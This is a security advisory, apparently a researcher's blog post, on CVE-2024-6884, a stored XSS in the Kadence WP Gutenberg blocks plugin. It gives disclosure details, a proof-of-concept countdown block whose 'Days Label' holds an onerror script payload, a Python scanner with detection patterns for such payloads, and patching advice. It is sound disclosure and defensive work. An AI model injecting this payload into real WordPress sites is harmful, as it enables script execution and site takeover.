In an era where digital content creation via platforms like WordPress is ubiquitous, the importance of cybersecurity cannot be overstated. A recent discovery has brought to light a critical vulnerability in the “Gutenberg Blocks with AI by Kadence WP” plugin, a popular tool used by over 400,000 installations worldwide. (CVE-2024-6884)

CVE: CVE-2024-6884
Plugin: Gutenberg Blocks with AI by Kadence WP < 3.2.39
Criticality: High
All time: 21 706 000
Active installations: 400 000+
Publicly published: July 15, 2024
Last updated: July 15, 2024
Researcher: Dmitrii Ignatyev
OWASP TOP-10: A7: Cross-Site Scripting (XSS)
PoC: Yes
Exploit: No
References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6884
https://wpscan.com/vulnerability/1768de0c-e4ea-4c98-abf1-7ac805f214b8/

Timeline

May 22, 2024: Plugin testing and vulnerability detection in Gutenberg Blocks with AI by Kadence WP completed
May 22, 2024: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
July 15, 2024: CVE-2024-6884 registered

Discovery of the Vulnerability

The flaw, designated CVE-2024-6884, was uncovered during routine security testing. It is a Stored Cross-Site Scripting (XSS) vulnerability that is triggered by inserting a specially crafted countdown block into a new post.

Understanding Stored XSS Attacks

Stored XSS attacks are particularly dangerous because they allow the attacker’s malicious script to be saved on the server, where it can be executed every time the affected page is loaded. This method has been exploited in various instances across different platforms, leading to unauthorized administrative access, data theft, and other malicious activities.

Exploiting the Stored XSS Vulnerability

The point of entry for this vulnerability is the plugin’s countdown block. When a contributor (a role that WordPress does not normally allow to publish unfiltered HTML) adds a countdown block and sets the ‘Days Label’ field to a malicious payload such as <img src=x onerror=alert(1);>, the script executes as soon as the page loads in a viewer’s browser.

POC:

<!-- wp:paragraph -->
<p>123</p>
<!-- /wp:paragraph -->

<!-- wp:kadence/countdown {"uniqueID":"319_fa912e-cc","date":"2024-05-24T05:14:16.437Z","timestamp":1716545656437,"timeOffset":0,"daysLabel":"\u0026lt;img src=x onerror=alert(1)\u0026gt;"} -->
<div class="wp-block-kadence-countdown kb-countdown-container kb-countdown-container-319_fa912e-cc kb-countdown-timer-layout-block kb-countdown-has-timer" data-id="319_fa912e-cc"><!-- wp:kadence/countdown-timer {"uniqueID":"319_638135-83"} -->
<div class="wp-block-kadence-countdown-timer kb-countdown-timer-319_638135-83 kb-countdown-timer"><div class="kb-countdown-item kb-countdown-date-item"><span class="kb-countdown-number"> </span><span class="kb-countdown-label"> </span></div></div>
<!-- /wp:kadence/countdown-timer --></div>
<!-- /wp:kadence/countdown -->
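As an added example (not part of the advisory and not the plugin’s own code), the following Python scan can be run over exported post_content to find countdown blocks whose label attributes decode to markup rather than plain words. It decodes both layers the PoC relies on (the block-comment JSON escape \u0026 and the HTML entities behind it); the sample post is constructed from the PoC structure above, and the label names other than daysLabel are assumed.

```python
import html
import json
import re

# Opening block comment plus its JSON attribute blob, e.g.
# <!-- wp:kadence/countdown {"uniqueID":"...","daysLabel":"..."} -->
BLOCK_RE = re.compile(r"<!--\s*wp:([a-z0-9/_-]+)\s*(\{.*?\})\s*/?-->", re.DOTALL)

# Label attributes of the countdown block that reach the rendered page. "daysLabel"
# is the field named in the advisory; the other names are assumed and adjustable.
LABEL_ATTRS = ("daysLabel", "hoursLabel", "minutesLabel", "secondsLabel")

# A label should be plain words: flag tags, inline event handlers and javascript: URLs.
SUSPICIOUS_RE = re.compile(r"<\s*[a-z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def find_suspicious_labels(post_content: str) -> list:
    """Return one finding per countdown label whose decoded value looks like markup."""
    findings = []
    for match in BLOCK_RE.finditer(post_content):
        block_name, raw_attrs = match.group(1), match.group(2)
        if block_name != "kadence/countdown":
            continue
        try:
            attrs = json.loads(raw_attrs)  # JSON layer: \u0026lt; becomes &lt;
        except json.JSONDecodeError:
            continue
        for key in LABEL_ATTRS:
            value = attrs.get(key)
            if not isinstance(value, str):
                continue
            decoded = html.unescape(value)  # entity layer: &lt;img ...&gt; becomes <img ...>
            if SUSPICIOUS_RE.search(decoded):
                findings.append({"uniqueID": attrs.get("uniqueID"), "attr": key, "value": decoded})
    return findings


# Constructed sample post_content: the countdown block from the PoC above (trimmed),
# followed by a benign countdown block that must not be flagged.
SAMPLE_POST = r'''<!-- wp:kadence/countdown {"uniqueID":"319_fa912e-cc","timeOffset":0,"daysLabel":"\u0026lt;img src=x onerror=alert(1)\u0026gt;"} -->
<div class="wp-block-kadence-countdown" data-id="319_fa912e-cc"><!-- wp:kadence/countdown-timer {"uniqueID":"319_638135-83"} -->
<div class="kb-countdown-timer"></div>
<!-- /wp:kadence/countdown-timer --></div>
<!-- /wp:kadence/countdown -->

<!-- wp:kadence/countdown {"uniqueID":"clean-1","daysLabel":"Days","hoursLabel":"Hours"} -->
<div class="wp-block-kadence-countdown" data-id="clean-1"></div>
<!-- /wp:kadence/countdown -->'''

for finding in find_suspicious_labels(SAMPLE_POST):
    print(f"block {finding['uniqueID']}: {finding['attr']} = {finding['value']!r}")
```

Only the block from the PoC is reported; the benign block with the labels Days and Hours passes.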


The implications of such a vulnerability are extensive. If the stored script runs in an administrator’s browser, an attacker acts with admin rights and could take over the entire website, manipulate site content, steal sensitive information from both the site and its users, and deploy further attacks on visitors.

Recommendations for Improved Security

To mitigate this vulnerability and enhance overall security, users of the Gutenberg Blocks with AI by Kadence WP plugin should:

  1. Immediately update the plugin to version 3.2.39 or later, which addresses this issue.
  2. Regularly review and sanitize inputs across all forms and content blocks to prevent script injections.
  3. Implement a robust Content Security Policy (CSP) that restricts the sources from which scripts can be loaded.
  4. Educate users with administrative privileges about the risks of XSS and the importance of secure coding practices.

By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-6884, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.


ARTYOM K.
CVE-2024-6884 – Gutenberg Blocks with AI by Kadence WP – Stored XSS to Admin Account Creation (Contributor+) – POC
